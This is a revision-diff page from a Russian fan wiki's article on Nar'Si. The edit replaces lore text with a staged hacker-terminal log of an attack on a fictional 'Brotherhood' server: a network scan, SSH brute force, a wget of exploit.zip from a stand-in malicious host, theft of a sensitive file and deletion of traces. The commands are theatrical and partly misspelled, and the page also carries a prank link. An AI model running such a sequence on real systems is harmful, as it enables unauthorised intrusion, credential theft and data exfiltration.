Нар'Си: различия между версиями

Материал из SUNRISE WIKI
(Косметика)
(Ссылки, эстетическая часть)
Строка 1: Строка 1:
  >ОТЧЁТ №3054
<code># Подключаемся к удаленному серверу Братства...
      >НАЧАЛО ОТЧЁТА
ssh user@brotherhood-server.com
    >ДАТА: <code>##</code>.<code>##</code>.3015
# Ввод пароля...
    >КОМУ: <code>@SOD</code>
Password: ********
    >03:24 <code>##</code>.<code>##</code>.3015 Мы получили запрос на [[ОБР|Отряд Быстрого Реагирования]] со станции <s>P</s><small>R</small>-<code>3</code><big>4</big><sup>5</sup>. Запрос <s>одобрен</s>, отряд <small><s>будет</s></small>
# Успешный вход в систему!
Welcome to Brotherhood Server!
# Запускаем сканирование сети для поиска уязвимых хостов...
nmap -sP [https://wiki.sunrise14.top/w/Участник:Siner 192.168.1.0]/24
# Сканирование завершено. Найденные устройства:
# [https://wiki.sunrise14.top/w/Обсуждение:Нар%27Си 192.168.1.5]  online
# [https://wiki.sunrise14.top/w/Культист_Нар%27Си 192.168.1.10]  online
# [https://wiki.sunrise14.top/w/Древние 192.168.1.20]  online
# Выбираем целевой сервер для дальнейшей атаки...
# Подключаемся к [https://wiki.sunrise14.top/w/%D0%9A%D1%83%D0%BB%D1%8C%D1%82%D0%B8%D1%81%D1%82_%D0%9D%D0%B0%D1%80%27%D0%A1%D0%B8 192.168.1.10]
ssh user@[https://wiki.sunrise14.top/w/%D0%9A%D1%83%D0%BB%D1%8C%D1%82%D0%B8%D1%81%D1%82_%D0%9D%D0%B0%D1%80%27%D0%A1%D0%B8 192.168.1.10]
Password: ********
# Вводим возможные комбинации паролей...
try_passwords.sh reverse_passwords.txt
# Атакуем методом брутфорса...
Sddra -l admin -P common_passwords.txt ssh://[https://wiki.sunrise14.top/w/%D0%9A%D1%83%D0%BB%D1%8C%D1%82%D0%B8%D1%81%D1%82_%D0%9D%D0%B0%D1%80%27%D0%A1%D0%B8 192.168.1.10]
[80][ssh] host: [https://wiki.sunrise14.top/w/%D0%9A%D1%83%D0%BB%D1%8C%D1%82%D0%B8%D1%81%D1%82_%D0%9D%D0%B0%D1%80%27%D0%A1%D0%B8 192.168.1.10]  login: admin  password: $LolIS$tNarRat_444@#$$$
# Успешно получили доступ к аккаунту администратора!
# Загружаем необходимые инструменты...
wget [https://r.mtdv.me/YouAreDie http://malicious-toolbox.com/exploit.zip]
unzip exploit.zip
# Запускаем эксплойт на сервере Братства...
./exploit -t [https://wiki.sunrise14.top/w/%D0%9A%D1%83%D0%BB%D1%8C%D1%82%D0%B8%D1%81%D1%82_%D0%9D%D0%B0%D1%80%27%D0%A1%D0%B8 192.168.1.10] -p 8080
# Ожидание подтверждения...
# Получаем доступ к файлам сервера!
# Перегружаем sensitive_data.txt...
sst user@[https://wiki.sunrise14.top/w/%D0%9A%D1%83%D0%BB%D1%8C%D1%82%D0%B8%D1%81%D1%82_%D0%9D%D0%B0%D1%80%27%D0%A1%D0%B8 192.168.1.10]:/path/to/sensitive_data.txt ./
# Все данные выгружены. Удаляем следы...
rm -rf exploit.zip sensitive_data.txt
# Завершаем сессию...
exit
Connection closed.</code>

Версия от 10:02, 30 марта 2025

# Подключаемся к удаленному серверу Братства...
ssh user@brotherhood-server.com
# Ввод пароля...
Password: ********

# Успешный вход в систему!
Welcome to Brotherhood Server!

# Запускаем сканирование сети для поиска уязвимых хостов...
nmap -sP 192.168.1.0/24

# Сканирование завершено. Найденные устройства:
# 192.168.1.5   online
# 192.168.1.10  online
# 192.168.1.20  online

# Выбираем целевой сервер для дальнейшей атаки...
# Подключаемся к 192.168.1.10
ssh user@192.168.1.10
Password: ********

# Вводим возможные комбинации паролей...
try_passwords.sh reverse_passwords.txt

# Атакуем методом брутфорса...
Sddra -l admin -P common_passwords.txt ssh://192.168.1.10
[80][ssh] host: 192.168.1.10   login: admin   password: $LolIS$tNarRat_444@#$$$

# Успешно получили доступ к аккаунту администратора!
# Загружаем необходимые инструменты...
wget http://malicious-toolbox.com/exploit.zip
unzip exploit.zip

# Запускаем эксплойт на сервере Братства...
./exploit -t 192.168.1.10 -p 8080
# Ожидание подтверждения...

# Получаем доступ к файлам сервера!
# Перегружаем sensitive_data.txt...
sst user@192.168.1.10:/path/to/sensitive_data.txt ./
# Все данные выгружены. Удаляем следы...
rm -rf exploit.zip sensitive_data.txt

# Завершаем сессию...
exit
Connection closed.